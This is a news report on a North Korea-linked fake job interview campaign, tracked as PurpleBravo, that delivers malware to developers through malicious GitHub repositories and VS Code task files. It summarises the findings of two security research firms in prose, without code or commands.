North Korean-linked hackers have targeted more than 3,100 IP addresses tied to AI, crypto, and finance firms through fake job interviews. The campaign used fraudulent recruiters and malicious coding tasks at global scale.
Recorded Future’s Insikt Group tracked the operation as PurpleBravo and linked it to the ‘Contagious Interview’ playbook. Jamf Threat Labs described a Visual Studio Code, or VS Code, backdoor technique aimed at macOS developers.
Insikt Group said PurpleBravo reached at least 3,136 internet protocol addresses during its monitoring period. The researchers said they have identified 20 victim organizations so far across several regions. Regions cited include South Asia, North America, Europe, the Middle East, and Central America.
Attackers posed as recruiters or developers and sent technical interview exercises, Insikt Group said. They asked candidates to clone repositories, review code, or complete assignments that required running tools.
Insikt Group warned that some candidates likely executed malicious code on corporate machines. Consequently, a single job seeker could create broader organizational exposure beyond the initial target.
Insikt Group said the operation relied on malicious GitHub repositories and fake recruiter outreach. The workflow mirrored common hiring steps, which can reduce scrutiny during take-home tests.
The profiles repeatedly claimed a base in Odessa, Ukraine, while focusing on job seekers from South Asia. Insikt Group said it could not determine why the actors used Ukrainian cover stories.
However, the firm said the personas showed consistent activity across repositories and social media chatter. Insikt Group also outlined infrastructure that supported command-and-control, or C2, operations.
The researchers said the hackers used Astrill VPN and IP ranges to administer China-based C2 servers. In addition, the report said 17 service providers hosted malware infrastructure. Insikt Group cited hosting for components tied to BeaverTail and GolangGhost.
Jamf Threat Labs said North Korea-linked users abuse VS Code task configuration files for malware delivery. The firm said victims clone GitHub or GitLab projects and open them in VS Code as a job assignment.
Jamf said the tactic was first identified in December 2025 and later refined. The infection chain starts when VS Code prompts a user to trust the repository author.
If the user grants trust, VS Code processes the repository’s tasks.json file, Jamf researcher Thijs Xhaflaire said. Xhaflaire said that processing can trigger arbitrary commands embedded in the configuration.
Jamf said an executed shell command retrieves a JavaScript payload and pipes it into the Node.js runtime. The firm said the payload persists after VS Code closes, then gathers system details and contacts a C2 server. Jamf said the backdoor enables remote code execution and system fingerprinting. It collects operating system information, hostnames, and media access control addresses, and it seeks a public IP.
Meanwhile, Insikt Group described two remote access trojans, or RATs, used in the broader campaign. The firm cited PylangGhost and GolangGhost as tools that steal browser credentials and cookies.
Insikt Group said GolangGhost supports several operating systems, while PylangGhost targets Windows. The report said PylangGhost can bypass Chrome’s app-bound credential protection on version 127 and later.
Insikt Group framed the latest activity after more than $2 billion in crypto theft in 2025. Still, both reports urged caution with unfamiliar repositories, especially before marking them trusted in VS Code.
Consequently, the findings suggest continued risk for hiring pipelines in AI, crypto, and financial services. Insikt Group said it continues tracking PurpleBravo as tactics shift across regions and platforms.
Also Read: DOJ Targets $15.1M USDT in North Korea Crypto Theft Case